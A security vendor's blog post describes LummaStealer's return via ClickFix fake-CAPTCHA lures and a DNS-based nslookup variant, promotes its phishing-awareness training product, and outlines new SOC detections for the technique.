LummaStealer Is Back, and It's Using Fake CAPTCHAs

LummaStealer (not to be confused with our very own Lumara) is back.

The major information-stealing malware was disrupted by Microsoft and the US Department of Justice in mid-2025, but recent reporting shows it has resurfaced with a new delivery method called ClickFix.

ClickFix relies on fake CAPTCHA prompts to trick users into running malicious commands. In a ClickFix scenario, users complete the familiar "verify you are human" prompt. Instead of validating access, clicking triggers malicious commands that deploy LummaStealer, allowing the malware to harvest critical data which could then be sold or passed to ransomware groups, including operators such as Octo Tempest.

A single fake CAPTCHA can open the door to full compromise. CAPTCHAs are designed as an additional layer of security, so most of us complete them without a second thought. This familiarity is what makes the attack effective.

The attack has continued to evolve beyond fake CAPTCHAs. Microsoft researchers recently documented a new variant where victims are instructed to run the nslookup command through the Windows Run dialog, querying an attacker-controlled DNS server. The malicious PowerShell payload is returned inside the DNS response itself, hidden inside normal-looking traffic. There is no suspicious file download to flag.

The method changes, but the entry point does not. In every variant, the attack succeeds because a user trusts a familiar process. User behaviour is the primary attack surface. When security measures we trust can be weaponised against us, ongoing education is critical.

Part of our Technology Extensions, Lumara Educate addresses this gap. With adaptive, AI-powered phishing simulations that are tailored to each user's skill level and adjusted based on their responses, it builds pattern recognition for the subtle tells that separate real verification from social engineering. Through repeated exposure to modern tactics, your team develops the instinct to pause and assess before that automatic click takes over.

ClickFix is just the latest example of how social engineering continues to adapt. Whether it's a fake CAPTCHA, a convincing phishing email, or a fraudulent request that seems to come from a trusted source, these attacks exploit the trust your team places in familiar processes. With Lumara Educate, your people are empowered to better understand the tactics behind modern threats, moving beyond simply following protocols to recognising and responding to evolving attacks with real insight. Your team becomes the frontline defence that recognises manipulation before damage occurs, closing the human behaviour gap and transforming your weakest link into your strongest defence.

Learn more about Lumara Extensions.

We're extending many of our exisiting customers SecOps with Lumara Educate this year. If you'd like to level up, drop us a quick request via this form and we'll be in contact.

How We Are Responding

Secure ISS has deployed two new detections targeting a recently observed evolution of ClickFix attacks, where cybercriminals abuse the Windows DNS system to deliver malware to victim machines. Unlike traditional attacks that download malicious files from websites (which security tools commonly detect and block) this technique hides the attack inside normal-looking DNS traffic, allowing it to bypass many conventional security controls. These detections identify the specific command patterns associated with this behaviour, providing SOC analysts with the visibility needed to investigate and scope the compromise.

Scenario

A staff member at a client site searches Google for help with a printer driver issue. A convincing fake IT support page appears in the results, instructing them to run a "diagnostic command" by pressing Win+R and pasting a command from the page. They follow the instructions without suspicion.

Both detections fire and are raised with the client's SOC team. Analysts are able to identify the exact machine, user, and timestamp of the initial compromise, confirm the DNS server contacted, and scope whether the activity was isolated to a single endpoint or broader. Rather than discovering the breach weeks later through ransomware or a data loss notification, the SOC has a precise starting point for their incident response.

— Dustin Kearney, Security Operations Team Leader